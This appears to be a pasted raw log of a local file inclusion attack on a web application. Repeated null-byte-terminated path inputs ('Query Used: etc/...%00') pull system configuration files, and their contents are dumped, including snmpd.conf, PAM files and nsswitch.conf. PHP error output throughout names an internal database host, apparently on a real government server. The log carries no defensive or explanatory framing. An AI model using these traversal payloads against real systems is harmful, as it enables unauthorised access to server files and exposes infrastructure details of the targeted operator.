  1178. # enterprises.ucdavis.procTable.prEntry.prMax.1 = 0
  1179. # enterprises.ucdavis.procTable.prEntry.prMax.2 = 4
  1180. # enterprises.ucdavis.procTable.prEntry.prMax.3 = 10
  1181. # enterprises.ucdavis.procTable.prEntry.prCount.1 = 0
  1182. # enterprises.ucdavis.procTable.prEntry.prCount.2 = 0
  1183. # enterprises.ucdavis.procTable.prEntry.prCount.3 = 1
  1184. # enterprises.ucdavis.procTable.prEntry.prErrorFlag.1 = 1
  1185. # enterprises.ucdavis.procTable.prEntry.prErrorFlag.2 = 0
  1186. # enterprises.ucdavis.procTable.prEntry.prErrorFlag.3 = 0
  1187. # enterprises.ucdavis.procTable.prEntry.prErrMessage.1 = "No mountd process running."
  1188. # enterprises.ucdavis.procTable.prEntry.prErrMessage.2 = ""
  1189. # enterprises.ucdavis.procTable.prEntry.prErrMessage.3 = ""
  1190. # enterprises.ucdavis.procTable.prEntry.prErrFix.1 = 0
  1191. # enterprises.ucdavis.procTable.prEntry.prErrFix.2 = 0
  1192. # enterprises.ucdavis.procTable.prEntry.prErrFix.3 = 0
  1193. #
  1194. # Note that the errorFlag for mountd is set to 1 because one is not
  1195. # running (in this case an rpc.mountd is, but thats not good enough),
  1196. # and the ErrMessage tells you what's wrong. The configuration
  1197. # imposed in the snmpd.conf file is also shown.
  1198. #
  1199. # Special Case: When the min and max numbers are both 0, it assumes
  1200. # you want a max of infinity and a min of 1.
  1201. #
  1202.  
  1203.  
  1204. # -----------------------------------------------------------------------------
  1205.  
  1206.  
  1207. ###############################################################################
  1208. # Executables/scripts
  1209. #
  1210.  
  1211. #
  1212. # You can also have programs run by the agent that return a single
  1213. # line of output and an exit code. Here are two examples.
  1214. #
  1215. # exec NAME PROGRAM [ARGS ...]
  1216. #
  1217. # NAME: A generic name. The name must be unique for each exec statement.
  1218. # PROGRAM: The program to run. Include the path!
  1219. # ARGS: optional arguments to be passed to the program
  1220.  
  1221. # a simple hello world
  1222.  
  1223. #exec echotest /bin/echo hello world
  1224.  
  1225. # Run a shell script containing:
  1226. #
  1227. # #!/bin/sh
  1228. # echo hello world
  1229. # echo hi there
  1230. # exit 35
  1231. #
  1232. # Note: this has been specifically commented out to prevent
  1233. # accidental security holes due to someone else on your system writing
  1234. # a /tmp/shtest before you do. Uncomment to use it.
  1235. #
  1236. #exec shelltest /bin/sh /tmp/shtest
  1237.  
  1238. # Then,
  1239. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.8
  1240. # enterprises.ucdavis.extTable.extEntry.extIndex.1 = 1
  1241. # enterprises.ucdavis.extTable.extEntry.extIndex.2 = 2
  1242. # enterprises.ucdavis.extTable.extEntry.extNames.1 = "echotest"
  1243. # enterprises.ucdavis.extTable.extEntry.extNames.2 = "shelltest"
  1244. # enterprises.ucdavis.extTable.extEntry.extCommand.1 = "/bin/echo hello world"
  1245. # enterprises.ucdavis.extTable.extEntry.extCommand.2 = "/bin/sh /tmp/shtest"
  1246. # enterprises.ucdavis.extTable.extEntry.extResult.1 = 0
  1247. # enterprises.ucdavis.extTable.extEntry.extResult.2 = 35
  1248. # enterprises.ucdavis.extTable.extEntry.extOutput.1 = "hello world."
  1249. # enterprises.ucdavis.extTable.extEntry.extOutput.2 = "hello world."
  1250. # enterprises.ucdavis.extTable.extEntry.extErrFix.1 = 0
  1251. # enterprises.ucdavis.extTable.extEntry.extErrFix.2 = 0
  1252.  
  1253. # Note that the second line of the /tmp/shtest shell script is cut
  1254. # off. Also note that the exit status of 35 was returned.
  1255.  
  1256. # -----------------------------------------------------------------------------
  1257.  
  1258.  
  1259. ###############################################################################
  1260. # disk checks
  1261. #
  1262.  
  1263. # The agent can check the amount of available disk space, and make
  1264. # sure it is above a set limit.
  1265.  
  1266. # disk PATH [MIN=100000]
  1267. #
  1268. # PATH: mount path to the disk in question.
  1269. # MIN: Disks with space below this value will have the Mib's errorFlag set.
  1270. # Default value = 100000.
  1271.  
  1272. # Check the / partition and make sure it contains at least 10 megs.
  1273.  
  1274. #disk / 10000
  1275.  
  1276. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.9
  1277. # enterprises.ucdavis.diskTable.dskEntry.diskIndex.1 = 0
  1278. # enterprises.ucdavis.diskTable.dskEntry.diskPath.1 = "/" Hex: 2F
  1279. # enterprises.ucdavis.diskTable.dskEntry.diskDevice.1 = "/dev/dsk/c201d6s0"
  1280. # enterprises.ucdavis.diskTable.dskEntry.diskMinimum.1 = 10000
  1281. # enterprises.ucdavis.diskTable.dskEntry.diskTotal.1 = 837130
  1282. # enterprises.ucdavis.diskTable.dskEntry.diskAvail.1 = 316325
  1283. # enterprises.ucdavis.diskTable.dskEntry.diskUsed.1 = 437092
  1284. # enterprises.ucdavis.diskTable.dskEntry.diskPercent.1 = 58
  1285. # enterprises.ucdavis.diskTable.dskEntry.diskErrorFlag.1 = 0
  1286. # enterprises.ucdavis.diskTable.dskEntry.diskErrorMsg.1 = ""
  1287.  
  1288. # -----------------------------------------------------------------------------
  1289.  
  1290.  
  1291. ###############################################################################
  1292. # load average checks
  1293. #
  1294.  
  1295. # load [1MAX=12.0] [5MAX=12.0] [15MAX=12.0]
  1296. #
  1297. # 1MAX: If the 1 minute load average is above this limit at query
  1298. # time, the errorFlag will be set.
  1299. # 5MAX: Similar, but for 5 min average.
  1300. # 15MAX: Similar, but for 15 min average.
  1301.  
  1302. # Check for loads:
  1303. #load 12 14 14
  1304.  
  1305. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.10
  1306. # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.1 = 1
  1307. # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.2 = 2
  1308. # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.3 = 3
  1309. # enterprises.ucdavis.loadTable.laEntry.loadaveNames.1 = "Load-1"
  1310. # enterprises.ucdavis.loadTable.laEntry.loadaveNames.2 = "Load-5"
  1311. # enterprises.ucdavis.loadTable.laEntry.loadaveNames.3 = "Load-15"
  1312. # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.1 = "0.49" Hex: 30 2E 34 39
  1313. # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.2 = "0.31" Hex: 30 2E 33 31
  1314. # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.3 = "0.26" Hex: 30 2E 32 36
  1315. # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.1 = "12.00"
  1316. # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.2 = "14.00"
  1317. # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.3 = "14.00"
  1318. # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.1 = 0
  1319. # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.2 = 0
  1320. # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.3 = 0
  1321. # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.1 = ""
  1322. # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.2 = ""
  1323. # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.3 = ""
  1324.  
  1325. # -----------------------------------------------------------------------------
  1326.  
  1327.  
  1328. ###############################################################################
  1329. # Extensible sections.
  1330. #
  1331.  
  1332. # This alleviates the multiple line output problem found in the
  1333. # previous executable mib by placing each mib in its own mib table:
  1334.  
  1335. # Run a shell script containing:
  1336. #
  1337. # #!/bin/sh
  1338. # echo hello world
  1339. # echo hi there
  1340. # exit 35
  1341. #
  1342. # Note: this has been specifically commented out to prevent
  1343. # accidental security holes due to someone else on your system writing
  1344. # a /tmp/shtest before you do. Uncomment to use it.
  1345. #
  1346. # exec .1.3.6.1.4.1.2021.50 shelltest /bin/sh /tmp/shtest
  1347.  
  1348. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.50
  1349. # enterprises.ucdavis.50.1.1 = 1
  1350. # enterprises.ucdavis.50.2.1 = "shelltest"
  1351. # enterprises.ucdavis.50.3.1 = "/bin/sh /tmp/shtest"
  1352. # enterprises.ucdavis.50.100.1 = 35
  1353. # enterprises.ucdavis.50.101.1 = "hello world."
  1354. # enterprises.ucdavis.50.101.2 = "hi there."
  1355. # enterprises.ucdavis.50.102.1 = 0
  1356.  
  1357. # Now the Output has grown to two lines, and we can see the 'hi
  1358. # there.' output as the second line from our shell script.
  1359. #
  1360. # Note that you must alter the mib.txt file to be correct if you want
  1361. # the .50.* outputs above to change to reasonable text descriptions.
  1362.  
  1363. # Other ideas:
  1364. #
  1365. # exec .1.3.6.1.4.1.2021.51 ps /bin/ps
  1366. # exec .1.3.6.1.4.1.2021.52 top /usr/local/bin/top
  1367. # exec .1.3.6.1.4.1.2021.53 mailq /usr/bin/mailq
  1368.  
  1369. # -----------------------------------------------------------------------------
  1370.  
  1371.  
  1372. ###############################################################################
  1373. # Pass through control.
  1374. #
  1375.  
  1376. # Usage:
  1377. # pass MIBOID EXEC-COMMAND
  1378. #
  1379. # This will pass total control of the mib underneath the MIBOID
  1380. # portion of the mib to the EXEC-COMMAND.
  1381. #
  1382. # Note: You'll have to change the path of the passtest script to your
  1383. # source directory or install it in the given location.
  1384. #
  1385. # Example: (see the script for details)
  1386. # (commented out here since it requires that you place the
  1387. # script in the right location. (its not installed by default))
  1388.  
  1389. # pass .1.3.6.1.4.1.2021.255 /bin/sh /usr/local/local/passtest
  1390.  
  1391. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.255
  1392. # enterprises.ucdavis.255.1 = "life the universe and everything"
  1393. # enterprises.ucdavis.255.2.1 = 42
  1394. # enterprises.ucdavis.255.2.2 = OID: 42.42.42
  1395. # enterprises.ucdavis.255.3 = Timeticks: (363136200) 42 days, 0:42:42
  1396. # enterprises.ucdavis.255.4 = IpAddress: 127.0.0.1
  1397. # enterprises.ucdavis.255.5 = 42
  1398. # enterprises.ucdavis.255.6 = Gauge: 42
  1399. #
  1400. # % snmpget -v 1 localhost public .1.3.6.1.4.1.2021.255.5
  1401. # enterprises.ucdavis.255.5 = 42
  1402. #
  1403. # % snmpset -v 1 localhost public .1.3.6.1.4.1.2021.255.1 s "New string"
  1404. # enterprises.ucdavis.255.1 = "New string"
  1405. #
  1406.  
  1407. # For specific usage information, see the man/snmpd.conf.5 manual page
  1408. # as well as the local/passtest script used in the above example.
  1409.  
  1410. ###############################################################################
  1411. # Further Information
  1412. #
  1413. # See the snmpd.conf manual page, and the output of "snmpd -H".
  1414. <b>Query Used: share/snmp/snmpd.conf%00</b>.<b>Query Used: etc/cvs-cron.conf%00</b>.<b>Query Used: etc/clamav/freshclam.conf%00</b>Array
  1415. (
  1416. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  1417. Too many connections
  1418. )
  1419. <b>Query Used: etc/ca-certificates.conf%00</b>.<b>Query Used: etc/debconf.conf%00</b>Array
  1420. (
  1421. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  1422. Too many connections
  1423. )
  1424. <b>Query Used: etc/bash_completion.d/debconf%00</b>.<b>Query Used: etc/tor/tor-tsocks.conf%00</b>.<b>Query Used: etc/htdig/htdig.conf%00</b>.<b>Query Used: etc/remastersys.conf%00</b>.<b>Query Used: etc/gnome-vfs-2.0/modules/default-modules.conf%00</b>.<b>Query Used: etc/gnome-vfs-2.0/modules/extra-modules.conf%00</b>.<b>Query Used: etc/gconf%00</b>.<b>Query Used: etc/gconf/gconf.xml.defaults%00</b>.<b>Query Used: etc/gconf/gconf.xml.defaults/%gconf-tree.xml%00</b>.<b>Query Used: etc/tor/tor-tsocks.conf%00</b>.<b>Query Used: etc/xdg/user-dirs.conf%00</b>.<b>Query Used: etc/htdig/htdig.conf%00</b>.<b>Query Used: etc/remastersys.conf%00</b>.<b>Query Used: etc/gnome-vfs-2.0/modules/default-modules.conf%00</b>.<b>Query Used: etc/gconf/gconf.xml.defaults%00</b>.<b>Query Used: etc/gconf/2%00</b>.<b>Query Used: etc/mysql/conf.d%00</b>.<b>Query Used: etc/gconf/gconf.xml.defaults/%gconf-tree.xml%00</b>.<b>Query Used: etc/gconf/gconf.xml.system%00</b>Array
  1425. (
  1426. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  1427. Too many connections
  1428. )
  1429. <b>Query Used: etc/gconf/2/evoldap.conf%00</b>.<b>Query Used: etc/gconf/2/path%00</b>.<b>Query Used: etc/gconf/gconf.xml.mandatory/%gconf-tree.xml%00</b>.<b>Query Used: etc/modprobe.d/vmware-tools.conf%00</b>.<b>Query Used: etc/fonts/conf.d%00</b><b>Query Used: etc/fonts/conf.d/README%00</b>conf.d/README
  1430.  
  1431. Each file in this directory is a fontconfig configuration file. Fontconfig
  1432. scans this directory, loading all files of the form [0-9][0-9]*.conf.
  1433. These files are normally installed in conf.avail and then symlinked here,
  1434. allowing them to be easily installed and then enabled/disabled by adjusting
  1435. the symlinks.
  1436.  
  1437. The files are loaded in numeric order, the structure of the configuration
  1438. has led to the following conventions in usage:
  1439.  
  1440. Files begining with: Contain:
  1441.  
  1442. 00 through 09 Font directories
  1443. 10 through 19 system rendering defaults (AA, etc)
  1444. 20 through 29 font rendering options
  1445. 30 through 39 family substitution
  1446. 40 through 49 generic identification, map family->generic
  1447. 50 through 59 alternate config file loading
  1448. 60 through 69 generic aliases, map generic->family
  1449. 70 through 79 select font (adjust which fonts are available)
  1450. 80 through 89 match target="scan" (modify scanned patterns)
  1451. 90 through 99 font synthesis
  1452. <b>Query Used: etc/miredo.confetc/bluetooth/input.conf%00</b>.<b>Query Used: etc/bluetooth/network.conf%00</b>.<b>Query Used: etc/bluetooth/rfcomm.conf%00</b>.<b>Query Used: etc/ldap/ldap.conf%00</b>.<b>Query Used: etc/cups/pdftops.conf%00</b>.<b>Query Used: etc/cups/cupsd.conf.default%00</b>.<b>Query Used: etc/cups/acroread.conf%00</b>.<b>Query Used: etc/cups/cupsd.conf%00</b>.<b>Query Used: etc/oinkmaster.conf%00</b>Array
  1453. (
  1454. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  1455. Too many connections
  1456. )
  1457. <b>Query Used: etc/security/time.conf%00</b># this is an example configuration file for the pam_time module. Its syntax
  1458. # was initially based heavily on that of the shadow package (shadow-960129).
  1459. #
  1460. # the syntax of the lines is as follows:
  1461. #
  1462. # services;ttys;users;times
  1463. #
  1464. # white space is ignored and lines maybe extended with '\\n' (escaped
  1465. # newlines). As should be clear from reading these comments,
  1466. # text following a '#' is ignored to the end of the line.
  1467. #
  1468. # the combination of individual users/terminals etc is a logic list
  1469. # namely individual tokens that are optionally prefixed with '!' (logical
  1470. # not) and separated with '&' (logical and) and '|' (logical or).
  1471. #
  1472. # services
  1473. # is a logic list of PAM service names that the rule applies to.
  1474. #
  1475. # ttys
  1476. # is a logic list of terminal names that this rule applies to.
  1477. #
  1478. # users
  1479. # is a logic list of users or a netgroup of users to whom this
  1480. # rule applies.
  1481. #
  1482. # NB. For these items the simple wildcard '*' may be used only once.
  1483. #
  1484. # times
  1485. # the format here is a logic list of day/time-range
  1486. # entries the days are specified by a sequence of two character
  1487. # entries, MoTuSa for example is Monday Tuesday and Saturday. Note
  1488. # that repeated days are unset MoMo = no day, and MoWk = all weekdays
  1489. # bar Monday. The two character combinations accepted are
  1490. #
  1491. # Mo Tu We Th Fr Sa Su Wk Wd Al
  1492. #
  1493. # the last two being week-end days and all 7 days of the week
  1494. # respectively. As a final example, AlFr means all days except Friday.
  1495. #
  1496. # each day/time-range can be prefixed with a '!' to indicate "anything
  1497. # but"
  1498. #
  1499. # The time-range part is two 24-hour times HHMM separated by a hyphen
  1500. # indicating the start and finish time (if the finish time is smaller
  1501. # than the start time it is deemed to apply on the following day).
  1502. #
  1503. # for a rule to be active, ALL of service+ttys+users must be satisfied
  1504. # by the applying process.
  1505. #
  1506.  
  1507. #
  1508. # Here is a simple example: running blank on tty* (any ttyXXX device),
  1509. # the users 'you' and 'me' are denied service all of the time
  1510. #
  1511.  
  1512. #blank;tty* & !ttyp*;you|me;!Al0000-2400
  1513.  
  1514. # Another silly example, user 'root' is denied xsh access
  1515. # from pseudo terminals at the weekend and on mondays.
  1516.  
  1517. #xsh;ttyp*;root;!WdMo0000-2400
  1518.  
  1519. #
  1520. # End of example file.
  1521. #
  1522. <b>Query Used: etc/security/sepermit.conf%00</b># /etc/security/sepermit.conf
  1523. #
  1524. # Each line contains either:
  1525. # - an user name
  1526. # - a group name, with @group syntax
  1527. # - a SELinux user name, with %seuser syntax
  1528. # Each line can contain optional arguments separated by :
  1529. # The possible arguments are:
  1530. # - exclusive - only single login session will
  1531. # be allowed for the user and the user's processes
  1532. # will be killed on logout
  1533. <b>Query Used: etc/security/limits.conf%00</b># /etc/security/limits.conf
  1534. #
  1535. #Each line describes a limit for a user in the form:
  1536. #
  1537. #<domain> <type> <item> <value>
  1538. #
  1539. #Where:
  1540. #<domain> can be:
  1541. # - an user name
  1542. # - a group name, with @group syntax
  1543. # - the wildcard *, for default entry
  1544. # - the wildcard %, can be also used with %group syntax,
  1545. # for maxlogin limit
  1546. #
  1547. #<type> can have the two values:
  1548. # - "soft" for enforcing the soft limits
  1549. # - "hard" for enforcing hard limits
  1550. #
  1551. #<item> can be one of the following:
  1552. # - core - limits the core file size (KB)
  1553. # - data - max data size (KB)
  1554. # - fsize - maximum filesize (KB)
  1555. # - memlock - max locked-in-memory address space (KB)
  1556. # - nofile - max number of open files
  1557. # - rss - max resident set size (KB)
  1558. # - stack - max stack size (KB)
  1559. # - cpu - max CPU time (MIN)
  1560. # - nproc - max number of processes
  1561. # - as - address space limit (KB)
  1562. # - maxlogins - max number of logins for this user
  1563. # - maxsyslogins - max number of logins on the system
  1564. # - priority - the priority to run user process with
  1565. # - locks - max number of file locks the user can hold
  1566. # - sigpending - max number of pending signals
  1567. # - msgqueue - max memory used by POSIX message queues (bytes)
  1568. # - nice - max nice priority allowed to raise to values: [-20, 19]
  1569. # - rtprio - max realtime priority
  1570. #
  1571. #<domain> <type> <item> <value>
  1572. #
  1573.  
  1574. #* soft core 0
  1575. #* hard rss 10000
  1576. #@student hard nproc 20
  1577. #@faculty soft nproc 20
  1578. #@faculty hard nproc 50
  1579. #ftp hard nproc 0
  1580. #@student - maxlogins 4
  1581.  
  1582. # End of file
  1583. <b>Query Used: etc/security/group.conf%00</b>#
  1584. # This is the configuration file for the pam_group module.
  1585. #
  1586.  
  1587. #
  1588. # *** Please note that giving group membership on a session basis is
  1589. # *** NOT inherently secure. If a user can create an executable that
  1590. # *** is setgid a group that they are infrequently given membership
  1591. # *** of, they can basically obtain group membership any time they
  1592. # *** like. Example: games are allowed between the hours of 6pm and 6am
  1593. # *** user joe logs in at 7pm writes a small C-program toplay.c that
  1594. # *** invokes their favorite shell, compiles it and does
  1595. # *** "chgrp play toplay; chmod g+s toplay". They are basically able
  1596. # *** to play games any time... You have been warned. AGM
  1597. #
  1598.  
  1599. #
  1600. # The syntax of the lines is as follows:
  1601. #
  1602. # services;ttys;users;times;groups
  1603. #
  1604. # white space is ignored and lines maybe extended with '\\n' (escaped
  1605. # newlines). From reading these comments, it is clear that
  1606. # text following a '#' is ignored to the end of the line.
  1607. #
  1608. # the combination of individual users/terminals etc is a logic list
  1609. # namely individual tokens that are optionally prefixed with '!' (logical
  1610. # not) and separated with '&' (logical and) and '|' (logical or).
  1611. #
  1612. # services
  1613. # is a logic list of PAM service names that the rule applies to.
  1614. #
  1615. # ttys
  1616. # is a logic list of terminal names that this rule applies to.
  1617. #
  1618. # users
  1619. # is a logic list of users or a netgroup of users to whom this
  1620. # rule applies.
  1621. #
  1622. # NB. For these items the simple wildcard '*' may be used only once.
  1623. # With netgroups no wildcards or logic operators are allowed.
  1624. #
  1625. # times
  1626. # It is used to indicate "when" these groups are to be given to the
  1627. # user. The format here is a logic list of day/time-range
  1628. # entries the days are specified by a sequence of two character
  1629. # entries, MoTuSa for example is Monday Tuesday and Saturday. Note
  1630. # that repeated days are unset MoMo = no day, and MoWk = all weekdays
  1631. # bar Monday. The two character combinations accepted are
  1632. #
  1633. # Mo Tu We Th Fr Sa Su Wk Wd Al
  1634. #
  1635. # the last two being week-end days and all 7 days of the week
  1636. # respectively. As a final example, AlFr means all days except Friday.
  1637. #
  1638. # Each day/time-range can be prefixed with a '!' to indicate "anything
  1639. # but"
  1640. #
  1641. # The time-range part is two 24-hour times HHMM separated by a hyphen
  1642. # indicating the start and finish time (if the finish time is smaller
  1643. # than the start time it is deemed to apply on the following day).
  1644. #
  1645. # groups
  1646. # The (comma or space separated) list of groups that the user
  1647. # inherits membership of. These groups are added if the previous
  1648. # fields are satisfied by the user's request
  1649. #
  1650. # For a rule to be active, ALL of service+ttys+users must be satisfied
  1651. # by the applying process.
  1652. #
  1653.  
  1654. #
  1655. # Note, to get this to work as it is currently typed you need
  1656. #
  1657. # 1. to run an application as root
  1658. # 2. add the following groups to the /etc/group file:
  1659. # floppy, play, sound
  1660. #
  1661.  
  1662. #
  1663. # Here is a simple example: running 'xsh' on tty* (any ttyXXX device),
  1664. # the user 'us' is given access to the floppy (through membership of
  1665. # the floppy group)
  1666. #
  1667.  
  1668. #xsh;tty*&!ttyp*;us;Al0000-2400;floppy
  1669.  
  1670. #
  1671. # another example: running 'xsh' on tty* (any ttyXXX device),
  1672. # the user 'sword' is given access to games (through membership of
  1673. # the sound and play group) after work hours.
  1674. #
  1675.  
  1676. #xsh; tty* ;sword;!Wk0900-1800;sound, play
  1677. #xsh; tty* ;*;Al0900-1800;floppy
  1678.  
  1679. #
  1680. # End of group.conf file
  1681. #
  1682. <b>Query Used: etc/security/pam_env.conf%00</b>#
  1683. # This is the configuration file for pam_env, a PAM module to load in
  1684. # a configurable list of environment variables for a
  1685. #
  1686. # The original idea for this came from Andrew G. Morgan ...
  1687. #<quote>
  1688. # Mmm. Perhaps you might like to write a pam_env module that reads a
  1689. # default environment from a file? I can see that as REALLY
  1690. # useful... Note it would be an "auth" module that returns PAM_IGNORE
  1691. # for the auth part and sets the environment returning PAM_SUCCESS in
  1692. # the setcred function...
  1693. #</quote>
  1694. #
  1695. # What I wanted was the REMOTEHOST variable set, purely for selfish
  1696. # reasons, and AGM didn't want it added to the SimpleApps login
  1697. # program (which is where I added the patch). So, my first concern is
  1698. # that variable, from there there are numerous others that might/would
  1699. # be useful to be set: NNTPSERVER, LESS, PATH, PAGER, MANPAGER .....
  1700. #
  1701. # Of course, these are a different kind of variable than REMOTEHOST in
  1702. # that they are things that are likely to be configured by
  1703. # administrators rather than set by logging in, how to treat them both
  1704. # in the same config file?
  1705. #
  1706. # Here is my idea:
  1707. #
  1708. # Each line starts with the variable name, there are then two possible
  1709. # options for each variable DEFAULT and OVERRIDE.
  1710. # DEFAULT allows and administrator to set the value of the
  1711. # variable to some default value, if none is supplied then the empty
  1712. # string is assumed. The OVERRIDE option tells pam_env that it should
  1713. # enter in its value (overriding the default value) if there is one
  1714. # to use. OVERRIDE is not used, "" is assumed and no override will be
  1715. # done.
  1716. #
  1717. # VARIABLE [DEFAULT=[value]] [OVERRIDE=[value]]
  1718. #
  1719. # (Possibly non-existent) environment variables may be used in values
  1720. # using the ${string} syntax and (possibly non-existent) PAM_ITEMs may
  1721. # be used in values using the @{string} syntax. Both the $ and @
  1722. # characters can be backslash escaped to be used as literal values
  1723. # values can be delimited with "", escaped " not supported.
  1724. # Note that many environment variables that you would like to use
  1725. # may not be set by the time the module is called.
  1726. # For example, HOME is used below several times, but
  1727. # many PAM applications don't make it available by the time you need it.
  1728. #
  1729. #
  1730. # First, some special variables
  1731. #
  1732. # Set the REMOTEHOST variable for any hosts that are remote, default
  1733. # to "localhost" rather than not being set at all
  1734. #REMOTEHOST DEFAULT=localhost OVERRIDE=@{PAM_RHOST}
  1735. #
  1736. # Set the DISPLAY variable if it seems reasonable
  1737. #DISPLAY DEFAULT=${REMOTEHOST}:0.0 OVERRIDE=${DISPLAY}
  1738. #
  1739. #
  1740. # Now some simple variables
  1741. #
  1742. #PAGER DEFAULT=less
  1743. #MANPAGER DEFAULT=less
  1744. #LESS DEFAULT="M q e h15 z23 b80"
  1745. #NNTPSERVER DEFAULT=localhost
  1746. #PATH DEFAULT=${HOME}/bin:/usr/local/bin:/bin\
  1747. #:/usr/bin:/usr/local/bin/X11:/usr/bin/X11
  1748. #
  1749. # silly examples of escaped variables, just to show how they work.
  1750. #
  1751. #DOLLAR DEFAULT=\$
  1752. #DOLLARDOLLAR DEFAULT= OVERRIDE=\$${DOLLAR}
  1753. #DOLLARPLUS DEFAULT=\${REMOTEHOST}${REMOTEHOST}
  1754. #ATSIGN DEFAULT="" OVERRIDE=\@
  1755. <b>Query Used: etc/deluser.conf%00</b>.<b>Query Used: etc/miredo-server.conf%00</b>.<b>Query Used: .etc/mail/sendmail.conf%00</b>.<b>Query Used: etc/belocs/locale-gen.conf%00</b>.<b>Query Used: etc/snort/threshold.conf%00</b>.<b>Query Used: etc/snort/rules/open-test.conf%00</b>.<b>Query Used: etc/snort/rules/emerging.conf%00</b>.<b>Query Used: etc/snort/snort-mysql.conf%00</b>.<b>Query Used: etc/snort/reference.config%00</b>.<b>Query Used: etc/arpalert/arpalert.conf%00</b>.<b>Query Used: etc/udev/udev.conf%00</b># The initial syslog(3) priority: "err", "info", "debug" or its
  1756. # numerical equivalent. For runtime debugging, the daemons internal
  1757. # state can be changed with: "udevadm control --log-priority=<value>".
  1758. udev_log="err"
  1759. <b>Query Used: etc/resolvconf%00</b>.<b>Query Used: etc/resolvconf/update-libc.d%00</b>.<b>Query Used: etc/resolvconf/update-libc.d/sendmail%00</b>.<b>Query Used: etc/airoscript.conf%00</b>.<b>Query Used: etc/foremost.conf%00</b>.<b>Query Used: etc/scrollkeeper.conf%00</b>.<b>Query Used: etc/pam.conf%00</b>.<b>Query Used: etc/nsswitch.conf%00</b>#
  1760. # /etc/nsswitch.conf
  1761. #
  1762. # An example Name Service Switch config file. This file should be
  1763. # sorted with the most-used services at the beginning.
  1764. #
  1765. # The entry '[NOTFOUND=return]' means that the search for an
  1766. # entry should stop if the search in the previous entry turned
  1767. # up nothing. Note that if the search failed due to some other reason
  1768. # (like no NIS server responding) then the search continues with the
  1769. # next entry.
  1770. #
  1771. # Valid entries include:
  1772. #
  1773. # nisplus Use NIS+ (NIS version 3)
  1774. # nis Use NIS (NIS version 2), also called YP
  1775. # dns Use DNS (Domain Name Service)
  1776. # files Use the local files
  1777. # db Use the local database (.db) files
  1778. # compat Use NIS on compat mode
  1779. # hesiod Use Hesiod for user lookups
  1780. # [NOTFOUND=return] Stop searching if not found so far
  1781. #
  1782.  
  1783. # To use db, put the "db" in front of "files" for entries you want to be
  1784. # looked up first in the databases
  1785. #
  1786. # Example:
  1787. #passwd: db files nisplus nis
  1788. #shadow: db files nisplus nis
  1789. #group: db files nisplus nis
  1790.  
  1791. passwd: files
  1792. shadow: files
  1793. group: files
  1794.  
  1795. #hosts: db files nisplus nis dns
  1796. hosts: files dns
  1797.  
  1798. # Example - obey only what nisplus tells us...
  1799. #services: nisplus [NOTFOUND=return] files
  1800. #networks: nisplus [NOTFOUND=return] files
  1801. #protocols: nisplus [NOTFOUND=return] files
  1802. #rpc: nisplus [NOTFOUND=return] files
  1803. #ethers: nisplus [NOTFOUND=return] files
  1804. #netmasks: nisplus [NOTFOUND=return] files
  1805.  
  1806. bootparams: nisplus [NOTFOUND=return] files
  1807.  
  1808. ethers: files
  1809. netmasks: files
  1810. networks: files
  1811. protocols: files
  1812. rpc: files
  1813. services: files
  1814.  
  1815. netgroup: nisplus
  1816.  
  1817. publickey: nisplus
  1818.  
  1819. automount: files nisplus
  1820. aliases: files nisplus
  1821.  
  1822. <b>Query Used: etc/initramfs-tools/conf.d%00</b>.<b>Query Used: etc/GeoIP.conf.default%00</b>.<b>Query Used: etc/proxychains.conf%00</b>.<b>Query Used: etc/host.conf%00</b>multi on
  1823. <b>Query Used: etc/tinyproxy/tinyproxy.conf%00</b>.<b>Query Used: etc/freetds/freetds.conf%00</b>.<b>Query Used: etc/prelude/default/global.conf%00</b>.<b>Query Used: etc/prelude/default/idmef-client.conf%00</b>.<b>Query Used: etc/prelude/default/tls.conf%00</b>.<b>Query Used: etc/apache2/httpd.conf%00</b>.<b>Query Used: etc/apache2/conf.d%00</b>.<b>Query Used: etc/apache2/conf.d/charset%00</b>.<b>Query Used: etc/apache2/mods-enabled/deflate.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/mime.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/dir.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/alias.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/php5.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/negotiation.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/status.conf%00</b>.<b>Query Used: etc/apache2/mods-available/proxy.conf%00</b>.<b>Query Used: etc/apache2/mods-available/deflate.conf%00</b>.<b>Query Used: etc/apache2/mods-available/mime.conf%00</b>.<b>Query Used: etc/apache2/mods-available/dir.conf%00</b>.<b>Query Used: etc/apache2/mods-available/mem_cache.conf%00</b>.<b>Query Used: etc/apache2/mods-available/ssl.conf%00</b>.<b>Query Used: etc/apache2/mods-available/autoindex.conf%00</b>.<b>Query Used: etc/apache2/mods-available/setenvif.conf%00</b>.<b>Query Used: etc/updatedb.conf%00</b>PRUNE_BIND_MOUNTS = "yes"
